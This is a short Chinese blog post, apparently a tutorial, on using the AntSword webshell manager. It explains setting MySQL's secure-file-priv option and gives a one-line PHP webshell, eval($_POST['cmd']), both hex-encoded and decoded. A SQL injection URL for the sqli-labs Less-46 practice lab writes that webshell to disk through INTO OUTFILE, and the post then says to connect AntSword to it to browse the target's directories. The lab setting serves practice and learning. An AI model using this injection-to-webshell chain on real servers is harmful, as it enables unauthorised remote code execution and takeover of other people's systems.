中国蚁剑使用方法

找到mysql配置文件

python 复制代码
secure-file-priv=

工作目录

python 复制代码
D:\tool\huli\gui_webshell\AntSword\AntSword\antSword-master

重点是tool目录后面 前面大家可能都不一样

添加数据

一句话木马

python 复制代码
3C3F706870206576616C28245F504F53545B22636D64225D293B3F3E
翻译过来
<?php eval($_POST["cmd"]);?>

示例天书第46关上传木马

python 复制代码
/?sort=1%20into%20outfile%20"D:\\phpstudy_pro\\WWW\\sql\\sqli-labs-master\\Less-46\\test1.php"%20lines%20terminated%20by%200x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

选择你上传一句话木马的url地址 具体到 你上传的文件名

这个参数就是连接密码

完成操作后 可以操作对方的目录

相关推荐
介一安全33 分钟前
【Frida Android】基础篇12:Native层hook基础——调用原生函数
android·网络安全·逆向·安全性测试·frida·1024程序员节
m0_738120722 小时前
网络安全编程——TCP客户端以及服务端Python实现
python·tcp/ip·安全·web安全·网络安全
白帽子黑客罗哥4 小时前
Redis实战深度剖析:高并发场景下的架构设计与性能优化
redis·网络安全·性能优化·高并发·分布式锁·秒杀系统·缓存架构
半路_出家ren6 小时前
设计一个学生管理系统的数据库
linux·数据库·sql·mysql·网络安全·数据库管理员
儒道易行11 小时前
【攻防实战】Redis未授权RCE联动metasploit打穿三层内网(上)
数据库·redis·网络安全·缓存
small_white_robot13 小时前
vulnerable_docker_containement 靶机
运维·网络·web安全·网络安全·docker·容器
Bruce_Liuxiaowei2 天前
[特殊字符] C&C服务器:网络攻击的指挥中心
运维·服务器·网络安全
-曾牛2 天前
深入浅出 SQL 注入
网络·sql·安全·网络安全·渗透测试·sql注入·盲注
汤愈韬2 天前
IIS服务器
windows·网络安全
-曾牛2 天前
从零到一:XSS靶场 haozi.me 全关卡通关教程(含冷知识汇总)
前端·网络安全·渗透测试·靶场·xss·攻略·靶场教程